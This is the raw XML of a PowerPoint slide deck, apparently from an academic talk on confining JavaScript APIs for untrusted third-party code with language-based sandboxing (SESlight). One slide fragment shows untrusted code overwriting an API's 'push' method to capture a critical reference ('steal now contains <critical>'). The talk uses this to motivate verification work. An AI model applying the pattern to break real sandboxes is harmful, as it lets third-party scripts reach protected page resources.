          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4773288" y="2895600"/>
            <a:ext cx="3608712" cy="930155"/>
            <a:chOff x="3853114" y="3741955"/>
            <a:chExt cx="3810002" cy="930155"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rounded Rectangular Callout 59"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3853114" y="3765419"/>
              <a:ext cx="3810001" cy="906691"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 21176"/>
                <a:gd name="adj2" fmla="val 49894"/>
                <a:gd name="adj3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853114" y="3741955"/>
              <a:ext cx="381000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Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>function </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>store(i,x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>)   </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>  {</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>log[i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>] = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Straight Arrow Connector 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3048000" y="3352800"/>
            <a:ext cx="1752600" cy="1588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609600" y="4648200"/>
            <a:ext cx="7944787" cy="1600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</a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> leaks !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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var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steal;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API.store(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“push”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,function(){steal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= this});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</a:rPr>
              <a:t>API.push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();  // steal now contains &lt;critical&gt;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Problems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878793" y="3976688"/>
            <a:ext cx="5112807" cy="13573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API Confinement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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify that no sandboxed untrusted program can use the API to obtain a critical reference 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878793" y="1981200"/>
            <a:ext cx="5112807" cy="1447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Sandboxing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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure that access to protected resources is obtained ONLY using the API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0" y="1981200"/>
            <a:ext cx="3829050" cy="3314700"/>
            <a:chOff x="152400" y="1371600"/>
            <a:chExt cx="5105400" cy="4114800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="laptop"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="152400" y="1371600"/>
              <a:ext cx="5105400" cy="4114800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2147483647 h 21600"/>
                <a:gd name="T8" fmla="*/ 2147483647 w 21600"/>
                <a:gd name="T9" fmla="*/ 0 h 21600"/>
                <a:gd name="T10" fmla="*/ 2147483647 w 21600"/>
                <a:gd name="T11" fmla="*/ 2147483647 h 21600"/>
                <a:gd name="T12" fmla="*/ 0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5 w 21600"/>
                <a:gd name="T25" fmla="*/ 1858 h 21600"/>
                <a:gd name="T26" fmla="*/ 17311 w 21600"/>
                <a:gd name="T27" fmla="*/ 1232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43000" y="1676400"/>
              <a:ext cx="3143250" cy="215265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anchorCtr="0"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76350" y="3352800"/>
              <a:ext cx="2762250" cy="381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anchorCtr="0"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Protected resources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00200" y="2910416"/>
              <a:ext cx="2286000" cy="44238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t" anchorCtr="0"/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bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>API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352550" y="2061864"/>
              <a:ext cx="2762250" cy="86760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accent3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 smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Sandboxed code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16-Point Star 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752597" y="2603567"/>
            <a:ext cx="457203" cy="450416"/>
          </a:xfrm>
          <a:prstGeom prst="star16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Confinement is a Complex Problem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JavaScript API Confinement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3989-3EFF-4C4D-9A9D-F370A7D41F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219200" y="1827208"/>
            <a:ext cx="457200" cy="457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9" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1066800" y="2208208"/>
            <a:ext cx="304800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill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4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1520212" y="2211996"/>
            <a:ext cx="312376" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill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05812" y="3050196"/>
            <a:ext cx="388576" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700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835032" y="3269568"/>
            <a:ext cx="673339" cy="228603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2400" y="4115011"/>
            <a:ext cx="2394167" cy="126188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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Resources,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Oval 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152398" y="1219200"/>
            <a:ext cx="2394169" cy="4419601"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln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Straight Connector 96"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1104900" y="2932108"/>
            <a:ext cx="304800" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent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 flipH="1">
            <a:off x="1295400" y="4037006"/>
            <a:ext cx="457200" cy="5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2546567" y="2559767"/>
            <a:ext cx="4159034" cy="488233"/>
            <a:chOff x="2546567" y="3169367"/>
            <a:chExt cx="4159034" cy="488233"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="67" name="Straight Arrow Connector 66"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="81" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2546567" y="3464810"/>
              <a:ext cx="2100104" cy="3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 rot="10800000" flipV="1">
              <a:off x="5029204" y="3464812"/>
              <a:ext cx="1676397" cy="1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45"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4572000" y="3169367"/>
              <a:ext cx="647701" cy="488233"/>
              <a:chOff x="3810000" y="1928096"/>
              <a:chExt cx="647701" cy="578928"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="81" name="Oval 80"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3810003" y="2049825"/>
                <a:ext cx="457200" cy="457199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3810000" y="1928096"/>
                <a:ext cx="6477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f</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
                  <a:t>1</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="TextBox 111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257299" y="1691627"/>
            <a:ext cx="64770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</p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="3215627"/>
            <a:ext cx="647701" cy="592781"/>
            <a:chOff x="1295400" y="3352800"/>
            <a:chExt cx="647701" cy="592781"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Oval 91"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1295400" y="3488381"/>
              <a:ext cx="457200" cy="457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95400" y="3352800"/>
              <a:ext cx="647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r</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="376378" y="4125405"/>
            <a:ext cx="466442" cy="1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59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="381000" y="3291827"/>
            <a:ext cx="647701" cy="600357"/>
            <a:chOff x="381000" y="3429000"/>
            <a:chExt cx="647701" cy="600357"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="381000" y="3572157"/>
              <a:ext cx="457200" cy="457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81000" y="3429000"/>
              <a:ext cx="647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r</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="762000" y="2453627"/>
            <a:ext cx="647701" cy="592781"/>
            <a:chOff x="762000" y="2590800"/>
            <a:chExt cx="647701" cy="592781"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Oval 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="762000" y="2726381"/>
              <a:ext cx="457200" cy="457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762000" y="2590800"/>
              <a:ext cx="647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r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705598" y="1879567"/>
            <a:ext cx="2133604" cy="2783860"/>
            <a:chOff x="6705598" y="2016740"/>
            <a:chExt cx="2133604" cy="2783860"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Rectangle 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6705601" y="2016740"/>
              <a:ext cx="2133600" cy="27838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705598" y="2016740"/>
              <a:ext cx="2133604" cy="2783860"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800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  <a:latin typeface="Courier"/>
                <a:cs typeface="Courier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6705597" y="4628184"/>
            <a:ext cx="2133604" cy="49244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Untrusted JS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4646671" y="2433935"/>
            <a:ext cx="235902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Invoke</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6972298" y="3834470"/>
            <a:ext cx="647701" cy="592781"/>
            <a:chOff x="762000" y="2590800"/>
            <a:chExt cx="647701" cy="592781"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Oval 74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="762000" y="2726381"/>
              <a:ext cx="457200" cy="457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62000" y="2590800"/>
              <a:ext cx="647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r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914400" y="1686580"/>
            <a:ext cx="6629400" cy="1590020"/>
            <a:chOff x="914400" y="1915180"/>
            <a:chExt cx="6629400" cy="1590020"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Arc 65"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="2362200"/>
              <a:ext cx="6629400" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst>
                <a:gd name="adj1" fmla="val 11055337"/>
                <a:gd name="adj2" fmla="val 20979930"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:prstDash val="dash"/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054350" y="1915180"/>
              <a:ext cx="2355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Return </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>r</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill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10800000" flipV="1">
              <a:off x="1152246" y="3106366"/>
              <a:ext cx="1438555" cy="2606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47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219200" y="2225027"/>
            <a:ext cx="5400955" cy="514261"/>
            <a:chOff x="1219200" y="2433935"/>
            <a:chExt cx="5400955" cy="514261"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="45" name="Straight Arrow Connector 44"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="1219200" y="2895600"/>
              <a:ext cx="5400955" cy="52596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048000" y="2433935"/>
              <a:ext cx="2355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Access </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>r</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" baseline="-25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57201" y="2842280"/>
            <a:ext cx="1219199" cy="1575728"/>
            <a:chOff x="457201" y="2979453"/>
            <a:chExt cx="1219199" cy="1575728"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58" name="Straight Arrow Connector 57"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="13" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="1220035" y="2911662"/>
              <a:ext cx="312374" cy="447955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10800000" flipV="1">
              <a:off x="495300" y="3148055"/>
              <a:ext cx="342900" cy="340327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rot="5400000">
              <a:off x="1413487" y="4139869"/>
              <a:ext cx="516581" cy="9244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rot="5400000">
              <a:off x="203532" y="4292269"/>
              <a:ext cx="516581" cy="9244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7581899" y="3148670"/>
            <a:ext cx="1257301" cy="1286157"/>
            <a:chOff x="7581899" y="3352800"/>
            <a:chExt cx="1257301" cy="1286157"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 60"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7581899" y="4038600"/>
              <a:ext cx="647701" cy="600357"/>
              <a:chOff x="381000" y="3429000"/>
              <a:chExt cx="647701" cy="600357"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="62" name="Oval 61"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="381000" y="3572157"/>
                <a:ext cx="457200" cy="4572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81000" y="3429000"/>
                <a:ext cx="6477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r</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
                  <a:t>3</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 67"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8191499" y="4038600"/>
              <a:ext cx="647701" cy="592781"/>
              <a:chOff x="1295400" y="3352800"/>
              <a:chExt cx="647701" cy="592781"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Oval 69"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1295400" y="3488381"/>
                <a:ext cx="457200" cy="4572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295400" y="3352800"/>
                <a:ext cx="6477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r</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
                  <a:t>4</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="82" name="Straight Connector 81"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="8086004" y="3724994"/>
              <a:ext cx="744389" cy="2"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:prstDash val="dash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6200000" flipH="1">
              <a:off x="7400207" y="3724994"/>
              <a:ext cx="744389" cy="2"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:prstDash val="dash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>
            <a:off x="1752601" y="3063227"/>
            <a:ext cx="4953001" cy="513965"/>
            <a:chOff x="1752601" y="3200400"/>
            <a:chExt cx="4953001" cy="513965"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="TextBox 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3276600" y="3200400"/>
              <a:ext cx="2355850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Side-effect </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>r</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="78" name="Straight Connector 77"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1752601" y="3712777"/>
              <a:ext cx="4953001" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent2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1685645" y="3741452"/>
            <a:ext cx="752755" cy="906748"/>
            <a:chOff x="1685645" y="3741452"/>
            <a:chExt cx="752755" cy="906748"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="80" name="Straight Arrow Connector 79"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="92" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="1574721" y="3852376"/>
              <a:ext cx="441201" cy="21935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1790701" y="4191000"/>
              <a:ext cx="457200" cy="4572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790699" y="4124980"/>
              <a:ext cx="647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u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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="98" name="Group 125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2743201" y="3977627"/>
            <a:ext cx="3722080" cy="1808496"/>
            <a:chOff x="7140494" y="2194630"/>
            <a:chExt cx="2115454" cy="1808496"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="Oval 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7140494" y="2194630"/>
              <a:ext cx="2115454" cy="1808496"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="50800" cap="flat">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:prstDash val="dash"/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urier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7486961" y="2804230"/>
              <a:ext cx="143484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accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Repeat </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="22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2678719" y="5786123"/>
            <a:ext cx="3874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Precision-Efficiency tradeoff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55" grpId="2"/>
      <p:bldP spid="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60000"/>
            <a:lumOff val="40000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
        </a:ln>
        <a:effectLst/>
      </a:spPr>
      <a:bodyPr rtlCol="0" anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr>
          <a:defRPr sz="2200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:latin typeface="Courier"/>
            <a:cs typeface="Courier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11326</TotalTime>
  <Words>4195</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>595</Paragraphs>
  <Slides>30</Slides>
  <Notes>26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Web 2.0 – Webpages with Third-party Code</vt:lpstr>
      <vt:lpstr>Embedded JavaScript Security Threats</vt:lpstr>
      <vt:lpstr>Language-based Sandboxing (This Work) </vt:lpstr>
      <vt:lpstr>Mediated Access</vt:lpstr>
      <vt:lpstr>API Design: Write-only Log Example</vt:lpstr>
      <vt:lpstr>API Design: Adding a store method</vt:lpstr>
      <vt:lpstr>Two Problems</vt:lpstr>
      <vt:lpstr>API Confinement is a Complex Problem</vt:lpstr>
      <vt:lpstr>Key Properties of API Implementations</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Evolution of Standardized JavaScript</vt:lpstr>
      <vt:lpstr>The SESlight language</vt:lpstr>
      <vt:lpstr>Scope-bounded eval</vt:lpstr>
      <vt:lpstr>Solving the Sandbox Problem for SESlight</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Setting up the API Confinement Problem</vt:lpstr>
      <vt:lpstr>Challenges &amp; Techniques</vt:lpstr>
      <vt:lpstr> Verifying Confine(t, critical)</vt:lpstr>
